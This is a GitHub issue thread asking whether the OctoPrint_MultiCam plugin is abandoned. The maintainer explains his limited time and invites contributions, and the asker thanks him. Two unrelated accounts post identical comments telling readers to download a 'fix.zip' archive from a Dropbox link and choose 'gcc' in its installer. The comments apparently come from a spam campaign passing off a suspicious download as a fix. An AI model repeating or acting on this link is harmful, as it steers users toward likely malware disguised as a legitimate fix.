mikedmor/OctoPrint_MultiCam #73: Abandoned?

BloodyIron, 2024-08-26:
So is this plugin abandoned or what's going on? No commits/updates for about a year. :(

pilot5657, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

IvanJrX, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

mikedmor, 2024-08-26:
Definitely not abandoned. I still utilize this on my own printer farm. However I dont have as much time as i use to, to work on updates for it anymore. It still appears to be working on my setup just fine though. So updates have not been really needed. 

I have plans to update for WebRTC, but for my own usages i dont really need it, so it has not been a priority. I have been a little busy however working 3 other jobs and since this brings in $0 it has been placed to the side until things are a little stable for me and my family. Feel free to contribute if you need a feature, and ill happily review what you submit and merge it into the repo. 

But to answer your question. Life is whats going on, and i do not quite have the time to continue working on this as i used to. However from my own usage this is still working just fine and does not really need anything else. Feel free to report a bug if you are experiencing an issue and either myself or someone else can look into a solution.

closed 2024-08-26 by mikedmor

BloodyIron, 2024-08-30:
> Definitely not abandoned. I still utilize this on my own printer farm. However I dont have as much time as i use to, to work on updates for it anymore. It still appears to be working on my setup [...]

Thanks for clarifying! ❤️❤️❤️

I hope things turn around for the better for you, and I totally understand when you need to shift priorities. :) I just wasn't entirely sure if I should work towards using this plugin or not is all. I had limited information to go on.

Thanks for your hard work on this, and please have a nice day/weekend. :) Whenever life permits, I hope you'll find the stamina to contribute again. And if I find anything worth reporting, or whatnot, I'll do my best to report useful info! \o/